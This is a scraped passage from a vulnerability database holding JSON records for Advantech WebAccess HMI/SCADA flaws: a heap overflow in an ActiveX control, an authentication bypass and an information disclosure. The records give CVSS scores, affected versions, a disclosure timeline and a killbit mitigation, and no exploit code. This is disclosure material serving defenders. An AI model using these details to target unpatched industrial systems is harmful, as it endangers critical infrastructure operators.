"@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HMI / SCADA software webaccess7.2 / 8.0 / 8.1 has 4 dll hijack vulnerabilities", "sources": [ { "db": "CNVD", "id": "CNVD-2016-10337" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "IVD", "id": "ff7dae53-c23c-40b0-9f59-13a4db97f36c" } ], "trust": 0.2 } }
var-201708-1704
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-539" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-539" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-539", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-539", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-539" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-539" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4097", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-539", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-539" } ] }, "id": "VAR-201708-1704", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:10:31.067000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-539" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-539" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-539", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-539", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-539", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media Caption Heap-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-539" } ], "trust": 0.7 } }
var-201708-1116
Vulnerability from variot
An Improper Authentication issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Specially crafted requests allow a possible authentication bypass that could allow remote code execution. Advantech WebAccess Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple heap-based buffer-overflow vulnerabilities. 3. Multiple memory-corruption vulnerabilities. 4. An SQL-injection vulnerability. 5. A format-string vulnerability. 6. An authentication-bypass vulnerability. 7. A security-bypass vulnerability. 8. A privilege-escalation vulnerability. 9. A remote-code execution vulnerability. An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and gain elevated privileges. This may aid in further attacks
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1116", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess \u003cv8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess 8.2 20170817", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "bbac1e4c-13fd-496f-9c11-c5fceb19ca21" }, { "db": "CNVD", "id": "CNVD-2017-23881" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007571" }, { "db": "CNNVD", "id": "CNNVD-201708-1282" }, { "db": "NVD", "id": "CVE-2017-12698" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007571" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fritz Sands, rgod, Tenable Network Security,an anonymous researcher all working with Trend Micro??s Zero Day Initiative, and Haojun Hou and DongWang from ADLab of Venustech.", "sources": [ { "db": "BID", "id": "100526" } ], "trust": 0.3 }, "cve": "CVE-2017-12698", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2017-12698", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-23881", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "bbac1e4c-13fd-496f-9c11-c5fceb19ca21", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-103246", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2017-12698", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-12698", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2017-12698", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2017-23881", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201708-1282", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "bbac1e4c-13fd-496f-9c11-c5fceb19ca21", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-103246", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "bbac1e4c-13fd-496f-9c11-c5fceb19ca21" }, { "db": "CNVD", "id": "CNVD-2017-23881" }, { "db": "VULHUB", "id": "VHN-103246" }, { "db": "JVNDB", "id": "JVNDB-2017-007571" }, { "db": "CNNVD", "id": "CNNVD-201708-1282" }, { "db": "NVD", "id": "CVE-2017-12698" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An Improper Authentication issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Specially crafted requests allow a possible authentication bypass that could allow remote code execution. Advantech WebAccess Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple stack-based buffer-overflow vulnerabilities\n2. Multiple heap-based buffer-overflow vulnerabilities. \n3. Multiple memory-corruption vulnerabilities. \n4. An SQL-injection vulnerability. \n5. A format-string vulnerability. \n6. An authentication-bypass vulnerability. \n7. A security-bypass vulnerability. \n8. A privilege-escalation vulnerability. \n9. A remote-code execution vulnerability. \nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and gain elevated privileges. This may aid in further attacks", "sources": [ { "db": "NVD", "id": "CVE-2017-12698" }, { "db": "JVNDB", "id": "JVNDB-2017-007571" }, { "db": "CNVD", "id": "CNVD-2017-23881" }, { "db": "BID", "id": "100526" }, { "db": "IVD", "id": "bbac1e4c-13fd-496f-9c11-c5fceb19ca21" }, { "db": "VULHUB", "id": "VHN-103246" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-12698", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-17-241-02", "trust": 3.4 }, { "db": "BID", "id": "100526", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201708-1282", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-23881", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-007571", "trust": 0.8 }, { "db": "IVD", "id": "BBAC1E4C-13FD-496F-9C11-C5FCEB19CA21", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-103246", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "bbac1e4c-13fd-496f-9c11-c5fceb19ca21" }, { "db": "CNVD", "id": "CNVD-2017-23881" }, { "db": "VULHUB", "id": "VHN-103246" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007571" }, { "db": "CNNVD", "id": "CNNVD-201708-1282" }, { "db": "NVD", "id": "CVE-2017-12698" } ] }, "id": "VAR-201708-1116", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "bbac1e4c-13fd-496f-9c11-c5fceb19ca21" }, { "db": "CNVD", "id": "CNVD-2017-23881" }, { "db": "VULHUB", "id": "VHN-103246" } ], "trust": 1.582962455 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "bbac1e4c-13fd-496f-9c11-c5fceb19ca21" }, { "db": "CNVD", "id": "CNVD-2017-23881" } ] }, "last_update_date": "2024-11-23T21:53:49.649000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech WebAccess verifies patches that bypass the vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/101165" }, { "title": "Advantech WebAccess Remediation measures for authorization problem vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=74371" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23881" }, { "db": "JVNDB", "id": "JVNDB-2017-007571" }, { "db": "CNNVD", "id": "CNNVD-201708-1282" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-287", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-103246" }, { "db": "JVNDB", "id": "JVNDB-2017-007571" }, { "db": "NVD", "id": "CVE-2017-12698" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-241-02" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/100526" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12698" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12698" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23881" }, { "db": "VULHUB", "id": "VHN-103246" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007571" }, { "db": "CNNVD", "id": "CNNVD-201708-1282" }, { "db": "NVD", "id": "CVE-2017-12698" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "bbac1e4c-13fd-496f-9c11-c5fceb19ca21" }, { "db": "CNVD", "id": "CNVD-2017-23881" }, { "db": "VULHUB", "id": "VHN-103246" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007571" }, { "db": "CNNVD", "id": "CNNVD-201708-1282" }, { "db": "NVD", "id": "CVE-2017-12698" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-30T00:00:00", "db": "IVD", "id": "bbac1e4c-13fd-496f-9c11-c5fceb19ca21" }, { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23881" }, { "date": "2017-08-30T00:00:00", "db": "VULHUB", "id": "VHN-103246" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-09-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007571" }, { "date": "2017-08-31T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1282" }, { "date": "2017-08-30T18:29:00.327000", "db": "NVD", "id": "CVE-2017-12698" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23881" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-103246" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-09-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007571" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1282" }, { "date": "2024-11-21T03:10:03.123000", "db": "NVD", "id": "CVE-2017-12698" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1282" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Authentication vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007571" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "authorization issue", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1282" } ], "trust": 0.6 } }
var-201601-0035
Vulnerability from variot
Advantech WebAccess before 8.1 allows remote attackers to obtain sensitive information via crafted input. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. A heap-based buffer overflow vulnerability 6. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A cross-site request forgery vulnerability 11. A remote-code execution vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences ('../') to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0035", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64d87b2c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00433" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001283" }, { "db": "CNNVD", "id": "CNNVD-201601-326" }, { "db": "NVD", "id": "CVE-2016-0853" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001283" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ilya Karpov of Positive Technologies, Ivan Sanchez, Andrea Micalizzi, Ariele Caltabiano, Fritz Sands, Steven Seeley, and an anonymous researcher", "sources": [ { "db": "BID", "id": "80745" } ], "trust": 0.3 }, "cve": "CVE-2016-0853", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2016-0853", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2016-00433", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "64d87b2c-2351-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-88363", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": 